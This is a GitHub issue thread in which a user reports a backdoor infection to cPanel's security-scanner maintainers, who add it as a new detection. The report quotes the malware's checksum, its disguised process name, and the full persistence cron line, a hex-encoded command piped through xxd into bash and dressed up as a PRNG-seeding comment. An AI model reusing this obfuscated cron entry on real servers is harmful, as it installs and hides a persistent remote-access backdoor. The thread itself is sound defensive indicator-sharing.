### ISSUE TITLE
New Detection

### ISSUE THREAD

**Issue by JQuags** [CpanelInc/tech-CSI#16]
/home/virtfs/home/XX/.config/dbus/gs-bd

process hiding as
[kcached/0]

checksum:
87460563d7426ffb06c2e7b7fc33a2247d14a005ab7cce818eee3c98a1747da2

cron:
# DO NOT REMOVE THIS LINE. SEED PRNG. #gs-bd-kernel
SHELL="/usr/local/cpanel/bin/jailshell"
59 * * * * echo 2f7573722f62696e2f706b696c6c202d30202d55313032382067732d626420323e2f6465762f6e756c6c207c7c205348454c4c3d2f7573722f6c6f63616c2f6370616e656c2f62696e2f6e6f7368656c6c205445524d3d787465726d2d323536636f6c6f722047534f434b45545f415247533d222d6b202f686f6d652f6469676974616c6e65787573696e74652f2e636f6e6669672f646275732f67732d62642e646174202d6c69714422202f7573722f62696e2f62617368202d63202265786563202d6120275b6b6361636865642f305d2720272f686f6d652f6469676974616c6e65787573696e74652f2e636f6e6669672f646275732f67732d626427220a|xxd -r -ps|bash #1b5b324a50524e47 >/dev/random # seed prng gs-bd-kernel

**Comment by cPanelPeter** [comment]
Hello, 

Thank you.  A couple of questions.

1) Is this a valid location?  /home/virtfs/home/XX/.config/dbus ?? /home/virtfs is a virtual filesystem.  Did you actually see a real /home/XX directory?  Or was it just under /home/virtfs?  or does XX refer to a username/account?

2) Is the [kcache/0] process listed with or without the brackets?  If you still have this on a server, could you please provide output from ps auxfwww?

3) Do you see the text `DO NOT REMOVE THIS LINE. SEED PRNG` within a users cron file?

**Comment by JQuags** [comment]
XX refers to the user

The process is like perl scripts hiding with [stealth] - cmd line shows with the brackets as [kcache/0]

The do not remove this line - everything pasted was in the user cron

**Comment by cPanelPeter** [comment]
Thank you, I have added this to the latest CSI.
